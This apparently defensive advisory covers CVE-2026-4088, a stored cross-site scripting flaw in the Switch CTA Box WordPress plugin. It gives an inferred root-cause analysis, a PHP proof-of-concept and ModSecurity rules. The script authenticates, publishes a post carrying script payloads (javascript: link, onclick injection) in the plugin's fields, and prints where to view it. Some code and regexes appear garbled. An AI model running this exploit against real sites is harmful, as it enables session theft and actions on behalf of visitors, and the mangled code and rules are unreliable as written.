CVE-2026-4088: Switch CTA Box <= 1.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode (switch-cta-box)

{
“analysis”: “Atomic Edge analysis of CVE-2026-4088 (metadata-based): This vulnerability allows stored cross-site scripting (XSS) via the ‘wppw_cta_box’ shortcode in the Switch CTA Box plugin for WordPress. The flaw affects all plugin versions up to and including 1.1. The CVSS score of 6.4 indicates a medium-severity issue. The attack requires contributor-level authentication.nnThe root cause is insufficient input sanitization and output escaping on post meta values read by the shortcode. Based on the CWE classification (79 – Improper Neutralization of Input During Web Page Generation) and the description, the plugin likely registers the shortcode and reads post meta values for fields like ‘cta_box_button_link’, ‘cta_box_button_id’, ‘cta_box_button_text’, and ‘cta_box_description’. It then echoes these values directly into HTML output without using escaping functions such as esc_attr(), esc_url(), or esc_html(). This is an inferred conclusion based on the vulnerability description, as no source code diff was available for review.nnAn attacker with contributor-level access or higher can exploit this by creating or editing a post and inserting the shortcode referencing another post ID. The attacker uses the post editor to supply malicious JavaScript payloads in the plugin’s custom fields (the post meta values). When the shortcode renders on a page, the unsanitized payload executes. The attack vector is straightforward: the shortcode processes attacker-controlled post meta and outputs it without escaping, so any page displaying the shortcode becomes a vector for XSS.nnRemediation requires implementing proper output escaping in the shortcode handler. The developer should apply esc_attr() for attribute outputs, esc_url() for URL outputs, and esc_html() for text outputs. Additionally, input sanitization should be added when saving post meta. Since no patched version exists, site administrators should either remove the plugin or disable the shortcode through code modifications.nnThe impact includes stored XSS that executes in the context of any user viewing a page containing the vulnerable shortcode. An attacker could steal session cookies, perform actions on behalf of other users, or inject malicious content. The CVSS vector indicates a scope change, meaning the injected script can affect resources beyond the vulnerable component.”,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-4088 – Switch CTA Box ‘alert(“XSS:button_text”)’,n ‘cta_box_description’ => ‘alert(“XSS:description”)’,n ‘cta_box_button_link’ => ‘javascript:alert(“XSS:link”)’,n ‘cta_box_button_id’ => ‘” onclick=”alert(‘XSS:id’)”‘n);nn// Step 1: Authenticaten$login_url = $target_url . ‘/wp-login.php’;n$login_data = array(n ‘log’ => $username,n ‘pwd’ => $password,n ‘remember’ => ‘true’,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’n);nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $login_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);n$response = curl_exec($ch);ncurl_close($ch);nnecho “[+] Authenticated as $username\n”;nn// Step 2: Create a new post with malicious meta (using WP REST API for simplicity)n$rest_url = $target_url . ‘/wp-json/wp/v2/posts’;n$post_data = array(n ‘title’ => ‘XSS Test Post – ‘ . uniqid(),n ‘content’ => ‘[wppw_cta_box id=”PLACEHOLDER”]’,n ‘status’ => ‘publish’,n ‘meta’ => array(n ‘cta_box_button_text’ => $payloads[‘cta_box_button_text’],n ‘cta_box_description’ => $payloads[‘cta_box_description’],n ‘cta_box_button_link’ => $payloads[‘cta_box_button_link’],n ‘cta_box_button_id’ => $payloads[‘cta_box_button_id’]n )n);nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $rest_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(‘Content-Type: application/json’));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);n$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nnif ($http_code != 201) {n die(“[!] Failed to create post. HTTP code: $http_code\n”);n}nn$new_post = json_decode($response, true);n$post_id = $new_post[‘id’];necho “[+] Created post ID: $post_id\n”;nn// Step 3: Update the shortcode to reference itself (id = the post we just created)n$update_url = $target_url . ‘/wp-json/wp/v2/posts/’ . $post_id;n$update_data = array(n ‘content’ => ‘[wppw_cta_box id=”‘ . $post_id . ‘”]’n);nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $update_url);ncurl_setopt($ch, CURLOPT_CUSTOMREQUEST, ‘PUT’);ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($update_data));ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(‘Content-Type: application/json’));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);n$response = curl_exec($ch);ncurl_close($ch);nnecho “[+] Updated post with self-referencing shortcode\n”;necho “[+] View the exploit at: ” . $target_url . ‘/?p=’ . $post_id . “\n”;necho “[+] If successful, JavaScript alerts will appear when viewing the post.\n”;n”,
“modsecurity_rule”: “{n “_comment”: “Atomic Edge WAF Rule – CVE-2026-4088 (metadata-based)”,n “rules”: [n {n “id”: 20264088,n “phase”: 2,n “deny”: true,n “status”: 403,n “msg”: “CVE-2026-4088 via Switch CTA Box shortcode parameter – XSS attempt in cta_box_button_text”,n “tag”: “CVE-2026-4088”,n “severity”: “CRITICAL”,n “operator”: {n “type”: “@rx”,n “value”: “]|]*[?/%>]”n },n “variables”: [n {n “type”: “REQUEST_URI”,n “value”: “/wp-json/wp/v2/posts”n },n {n “type”: “ARGS_POST:meta\\[cta_box_button_text\\]”n }n ]n },n {n “id”: 20264089,n “phase”: 2,n “deny”: true,n “status”: 403,n “msg”: “CVE-2026-4088 via Switch CTA Box shortcode parameter – XSS attempt in cta_box_description”,n “tag”: “CVE-2026-4088”,n “severity”: “CRITICAL”,n “operator”: {n “type”: “@rx”,n “value”: “]|]*[?/%>]”n },n “variables”: [n {n “type”: “REQUEST_URI”,n “value”: “/wp-json/wp/v2/posts”n },n {n “type”: “ARGS_POST:meta\\[cta_box_description\\]”n }n ]n },n {n “id”: 20264090,n “phase”: 2,n “deny”: true,n “status”: 403,n “msg”: “CVE-2026-4088 via Switch CTA Box shortcode parameter – XSS attempt in cta_box_button_link”,n “tag”: “CVE-2026-4088”,n “severity”: “CRITICAL”,n “operator”: {n “type”: “@rx”,n “value”: “^javascript:|]|]*[?/%>]”n },n “variables”: [n {n “type”: “REQUEST_URI”,n “value”: “/wp-json/wp/v2/posts”n },n {n “type”: “ARGS_POST:meta\\[cta_box_button_link\\]”n }n ]n },n {n “id”: 20264091,n “phase”: 2,n “deny”: true,n “status”: 403,n “msg”: “CVE-2026-4088 via Switch CTA Box shortcode parameter – XSS attempt in cta_box_button_id”,n “tag”: “CVE-2026-4088”,n “severity”: “CRITICAL”,n “operator”: {n “type”: “@rx”,n “value”: “\”[^\”]*on\\w+\s*=\”|” onclick=”n },n “variables”: [n {n “type”: “REQUEST_URI”,n “value”: “/wp-json/wp/v2/posts”n },n {n “type”: “ARGS_POST:meta\\[cta_box_button_id\\]”n }n ]n }n ]n}”
}